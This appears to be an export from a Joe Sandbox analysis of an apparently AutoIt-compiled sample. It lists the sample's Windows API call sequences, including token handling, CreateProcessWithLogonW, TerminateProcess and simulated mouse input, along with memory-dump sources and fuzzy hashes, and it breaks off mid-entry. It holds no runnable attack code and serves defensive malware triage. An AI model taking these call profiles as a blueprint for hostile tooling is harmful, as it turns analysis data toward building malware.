                                                • Instruction ID: 6e80228cfdeb20cf9e2a929b6206ff94f680cb4fa683346c19dd631c0cb81ff0
                                                • Opcode Fuzzy Hash: 7fc1447a8cd959e8a56669f924491bf5c46190250265f764fe14699f52d858e9
                                                • Instruction Fuzzy Hash: CC515D35A00616AFDF12EF64CC459AEBBB4EF49310F144099ED41BB391CB75AE419F90
                                                APIs
                                                • VariantInit.OLEAUT32(?), ref: 00FDEF06
                                                • VariantClear.OLEAUT32(00000013), ref: 00FDEF78
                                                • VariantClear.OLEAUT32(00000000), ref: 00FDEFD3
                                                • _memmove.LIBCMT ref: 00FDEFFD
                                                • VariantClear.OLEAUT32(?), ref: 00FDF04A
                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00FDF078
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Variant$Clear$ChangeInitType_memmove
                                                • String ID:
                                                • API String ID: 1101466143-0
                                                • Opcode ID: bdd0d3df9d9f4748218c44c530b205e545f3760de5125439095fc3c9843581f3
                                                • Instruction ID: 3b63dc40074c9c0eeb6c4444de04bbd19365a3aafd8e0f57218c4f0ca9373611
                                                • Opcode Fuzzy Hash: bdd0d3df9d9f4748218c44c530b205e545f3760de5125439095fc3c9843581f3
                                                • Instruction Fuzzy Hash: 40516BB5A00209DFCB20DF58C884EAAB7B9FF4C314B15856AED49DB305E735E911CBA0
                                                APIs
                                                • _memset.LIBCMT ref: 00FE2258
                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FE22A3
                                                • IsMenu.USER32(00000000), ref: 00FE22C3
                                                • CreatePopupMenu.USER32 ref: 00FE22F7
                                                • GetMenuItemCount.USER32(000000FF), ref: 00FE2355
                                                • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00FE2386
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                • String ID:
                                                • API String ID: 3311875123-0
                                                • Opcode ID: 019e091c88d8f586e33d039f83ba587a45971a8bb11d2471037e38454b441f9f
                                                • Instruction ID: 3eff7dbc4ea8bbc961d83fd0cf279509ebf0b34c3c9be59dd3287a93cfa2734a
                                                • Opcode Fuzzy Hash: 019e091c88d8f586e33d039f83ba587a45971a8bb11d2471037e38454b441f9f
                                                • Instruction Fuzzy Hash: 8151F370A0128ADFDF61CF6AC888BAEBBF9FF05324F104119E85597290E3798904EF51
                                                APIs
                                                  • Part of subcall function 00F82612: GetWindowLongW.USER32(?,000000EB), ref: 00F82623
                                                • BeginPaint.USER32(?,?,?,?,?,?), ref: 00F8179A
                                                • GetWindowRect.USER32(?,?), ref: 00F817FE
                                                • ScreenToClient.USER32(?,?), ref: 00F8181B
                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00F8182C
                                                • EndPaint.USER32(?,?), ref: 00F81876
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                • String ID:
                                                • API String ID: 1827037458-0
                                                • Opcode ID: a3001b577bd60f013aafd126465b28de4db959517d1184691bba916330606cec
                                                • Instruction ID: 604bcbd06bf8092f069823d9cecb0d404e3939d7ed6ddf5d0d3f09fe9c7638ee
                                                • Opcode Fuzzy Hash: a3001b577bd60f013aafd126465b28de4db959517d1184691bba916330606cec
                                                • Instruction Fuzzy Hash: E741BE71504301AFD721EF25CCC5FEA7BECFB4A324F140229F9A4861A1CB759846EB61
                                                APIs
                                                • ShowWindow.USER32(010457B0,00000000,01914B08,?,?,010457B0,?,0100B5A8,?,?), ref: 0100B712
                                                • EnableWindow.USER32(00000000,00000000), ref: 0100B736
                                                • ShowWindow.USER32(010457B0,00000000,01914B08,?,?,010457B0,?,0100B5A8,?,?), ref: 0100B796
                                                • ShowWindow.USER32(00000000,00000004,?,0100B5A8,?,?), ref: 0100B7A8
                                                • EnableWindow.USER32(00000000,00000001), ref: 0100B7CC
                                                • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0100B7EF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Window$Show$Enable$MessageSend
                                                • String ID:
                                                • API String ID: 642888154-0
                                                • Opcode ID: 770adce1846c5635300755deb9c75107cd872a55a7981c2df89913d44ab34ea6
                                                • Instruction ID: c796cf0a387fda7cfcfd578a4dd4522f72fc17d95dc939a1aacbc8c9f56c5117
                                                • Opcode Fuzzy Hash: 770adce1846c5635300755deb9c75107cd872a55a7981c2df89913d44ab34ea6
                                                • Instruction Fuzzy Hash: 1D412C38600241AFEB67CF28C499B947BE1FF09710F1C41E9EA8C9F6A2C731A456DB51
                                                APIs
                                                • GetForegroundWindow.USER32(?,?,?,?,?,?,00FF4E41,?,?,00000000,00000001), ref: 00FF70AC
                                                  • Part of subcall function 00FF39A0: GetWindowRect.USER32(?,?), ref: 00FF39B3
                                                • GetDesktopWindow.USER32 ref: 00FF70D6
                                                • GetWindowRect.USER32(00000000), ref: 00FF70DD
                                                • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00FF710F
                                                  • Part of subcall function 00FE5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FE52BC
                                                • GetCursorPos.USER32(?), ref: 00FF713B
                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00FF7199
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                • String ID:
                                                • API String ID: 4137160315-0
                                                • Opcode ID: 36666acca8e5e5276b2d3f2216cc31251b69eeb37f410fe15e0342eef46f70fc
                                                • Instruction ID: 63ba64abf8b6a9d1134c53e0ab72108446cf3db57f60829e41faa659af7b3fdb
                                                • Opcode Fuzzy Hash: 36666acca8e5e5276b2d3f2216cc31251b69eeb37f410fe15e0342eef46f70fc
                                                • Instruction Fuzzy Hash: 1031B47250930AABD730EF14C849B5BB7AAFF88314F000519F68597191CB75EA09DB92
                                                APIs
                                                  • Part of subcall function 00FD80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00FD80C0
                                                  • Part of subcall function 00FD80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00FD80CA
                                                  • Part of subcall function 00FD80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00FD80D9
                                                  • Part of subcall function 00FD80A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00FD80E0
                                                  • Part of subcall function 00FD80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00FD80F6
                                                • GetLengthSid.ADVAPI32(?,00000000,00FD842F), ref: 00FD88CA
                                                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00FD88D6
                                                • HeapAlloc.KERNEL32(00000000), ref: 00FD88DD
                                                • CopySid.ADVAPI32(00000000,00000000,?), ref: 00FD88F6
                                                • GetProcessHeap.KERNEL32(00000000,00000000,00FD842F), ref: 00FD890A
                                                • HeapFree.KERNEL32(00000000), ref: 00FD8911
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                • String ID:
                                                • API String ID: 3008561057-0
                                                • Opcode ID: 9da9ae71cf0fd43b75df0f33f10d561b84e8141ba4b9679672436fd9f52924a7
                                                • Instruction ID: aad1dc6b98e10def23f3b47e4ce9551ef43e545d32356de90ab2f30f714bac9a
                                                • Opcode Fuzzy Hash: 9da9ae71cf0fd43b75df0f33f10d561b84e8141ba4b9679672436fd9f52924a7
                                                • Instruction Fuzzy Hash: 7711A272901205FFDB21DF94DC19BBE777AEB45761F14401AF88597200CB369901FB61
                                                APIs
                                                • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00FD85E2
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00FD85E9
                                                • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00FD85F8
                                                • CloseHandle.KERNEL32(00000004), ref: 00FD8603
                                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00FD8632
                                                • DestroyEnvironmentBlock.USERENV(00000000), ref: 00FD8646
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                • String ID:
                                                • API String ID: 1413079979-0
                                                • Opcode ID: d97a005f6ad532a436b14217234d91acfc810a8e544dbc1c6da581471f7e1580
                                                • Instruction ID: a36a9f96ca7cdf5ea00ea3545bc9767f19f908936f3e334ef8cf0bd75de9332d
                                                • Opcode Fuzzy Hash: d97a005f6ad532a436b14217234d91acfc810a8e544dbc1c6da581471f7e1580
                                                • Instruction Fuzzy Hash: F8115C7250020AABDF22CFA4ED49BDE7BA9EF08764F084055FE05A2150C7769D61EB61
                                                APIs
                                                • GetDC.USER32(00000000), ref: 00FDB7B5
                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 00FDB7C6
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FDB7CD
                                                • ReleaseDC.USER32(00000000,00000000), ref: 00FDB7D5
                                                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00FDB7EC
                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 00FDB7FE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: CapsDevice$Release
                                                • String ID:
                                                • API String ID: 1035833867-0
                                                • Opcode ID: 75e9052521dac28db73bd8296ade266fbd22c99ccb9ac89725b4a0368b08221f
                                                • Instruction ID: d23ed5fb3c979b889b15ac28fa63c955efb707ad227f59b0bbc4f83ee3a656fe
                                                • Opcode Fuzzy Hash: 75e9052521dac28db73bd8296ade266fbd22c99ccb9ac89725b4a0368b08221f
                                                • Instruction Fuzzy Hash: 5D018875E00305BBEB209FB69C45A5EBFB8EB48361F044066FA08A7381D6359C00DF50
                                                APIs
                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FA0193
                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 00FA019B
                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FA01A6
                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FA01B1
                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00FA01B9
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FA01C1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Virtual
                                                • String ID:
                                                • API String ID: 4278518827-0
                                                • Opcode ID: c2e2a8e205a596f1f0629439e6e323dd62fee0066efa869ad00b16e27ad306b0
                                                • Instruction ID: b6e77dd55adf3cbc40442f8eb72ecb0c1450f09a3a826d779fecce4f4c8c6ae8
                                                • Opcode Fuzzy Hash: c2e2a8e205a596f1f0629439e6e323dd62fee0066efa869ad00b16e27ad306b0
                                                • Instruction Fuzzy Hash: 9D016CB090175A7DE3008F6A8C85B52FFA8FF19354F00411BA15C47941C7F5A864CBE5
                                                APIs
                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00FE53F9
                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00FE540F
                                                • GetWindowThreadProcessId.USER32(?,?), ref: 00FE541E
                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FE542D
                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FE5437
                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FE543E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                • String ID:
                                                • API String ID: 839392675-0
                                                • Opcode ID: 7689ff38643b3cee7d7c1139e7cb1b0dd0c3d91196acb42aae48f7476c49c7cc
                                                • Instruction ID: f49b04962ae9ae95d26ae92c7d9aaa2ffa658a0d4372c13b3b40d5992a2cd7b1
                                                • Opcode Fuzzy Hash: 7689ff38643b3cee7d7c1139e7cb1b0dd0c3d91196acb42aae48f7476c49c7cc
                                                • Instruction Fuzzy Hash: 29F06D32240559BBE3325BA29C0DEEB7B7CEBCAB11F000159FA44D10809AAA1A01A7B5
                                                APIs
                                                • InterlockedExchange.KERNEL32(?,?), ref: 00FE7243
                                                • EnterCriticalSection.KERNEL32(?,?,00F90EE4,?,?), ref: 00FE7254
                                                • TerminateThread.KERNEL32(00000000,000001F6,?,00F90EE4,?,?), ref: 00FE7261
                                                • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00F90EE4,?,?), ref: 00FE726E
                                                  • Part of subcall function 00FE6C35: CloseHandle.KERNEL32(00000000,?,00FE727B,?,00F90EE4,?,?), ref: 00FE6C3F
                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00FE7281
                                                • LeaveCriticalSection.KERNEL32(?,?,00F90EE4,?,?), ref: 00FE7288
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                • String ID:
                                                • API String ID: 3495660284-0
                                                • Opcode ID: d75ea6610a8a189857e537b0aadfc709aef35f1f253b0cae9a79517841bf0a0d
                                                • Instruction ID: 98b256d5702b06d4ab5c287843febca9ae8548c730ecd8920f9a1a8b4a2bd7ba
                                                • Opcode Fuzzy Hash: d75ea6610a8a189857e537b0aadfc709aef35f1f253b0cae9a79517841bf0a0d
                                                • Instruction Fuzzy Hash: A6F05E36544713ABE7323B64ED4C9DA7729EF45712F100521F683D1098CB7B5801EB50
                                                APIs
                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00FD899D
                                                • UnloadUserProfile.USERENV(?,?), ref: 00FD89A9
                                                • CloseHandle.KERNEL32(?), ref: 00FD89B2
                                                • CloseHandle.KERNEL32(?), ref: 00FD89BA
                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00FD89C3
                                                • HeapFree.KERNEL32(00000000), ref: 00FD89CA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                • String ID:
                                                • API String ID: 146765662-0
                                                • Opcode ID: 27d89349b61a38275d016bb25bcb413a96e2e924f7186123d395bbede39bf002
                                                • Instruction ID: d82eeb8144335d3076d5c397a13ba6d18da09fbbc643793b18bfac08ed8f583d
                                                • Opcode Fuzzy Hash: 27d89349b61a38275d016bb25bcb413a96e2e924f7186123d395bbede39bf002
                                                • Instruction Fuzzy Hash: 12E0ED36004502BBD7226FE1EC0C945BF79FF89722F108220F259C1068CB375460EB50
                                                APIs
                                                • VariantInit.OLEAUT32(?), ref: 00FF8613
                                                • CharUpperBuffW.USER32(?,?), ref: 00FF8722
                                                • VariantClear.OLEAUT32(?), ref: 00FF889A
                                                  • Part of subcall function 00FE7562: VariantInit.OLEAUT32(00000000), ref: 00FE75A2
                                                  • Part of subcall function 00FE7562: VariantCopy.OLEAUT32(00000000,?), ref: 00FE75AB
                                                  • Part of subcall function 00FE7562: VariantClear.OLEAUT32(00000000), ref: 00FE75B7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                • API String ID: 4237274167-1221869570
                                                • Opcode ID: c9cac1ab04614ca4e4b8bab2343d047c635718d5af5e29db03d5e5da7f25d132
                                                • Instruction ID: f04304902e199dd7a9c0a694476deb0d20df0771985001b4fa6fcd2c30928b6e
                                                • Opcode Fuzzy Hash: c9cac1ab04614ca4e4b8bab2343d047c635718d5af5e29db03d5e5da7f25d132
                                                • Instruction Fuzzy Hash: D491A071A083059FC710EF24C88096AB7E4EF89754F04896EF98ACB361DB34ED06DB91
                                                APIs
                                                  • Part of subcall function 00F9FC86: _wcscpy.LIBCMT ref: 00F9FCA9
                                                • _memset.LIBCMT ref: 00FE2B87
                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00FE2BB6
                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00FE2C69
                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00FE2C97
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
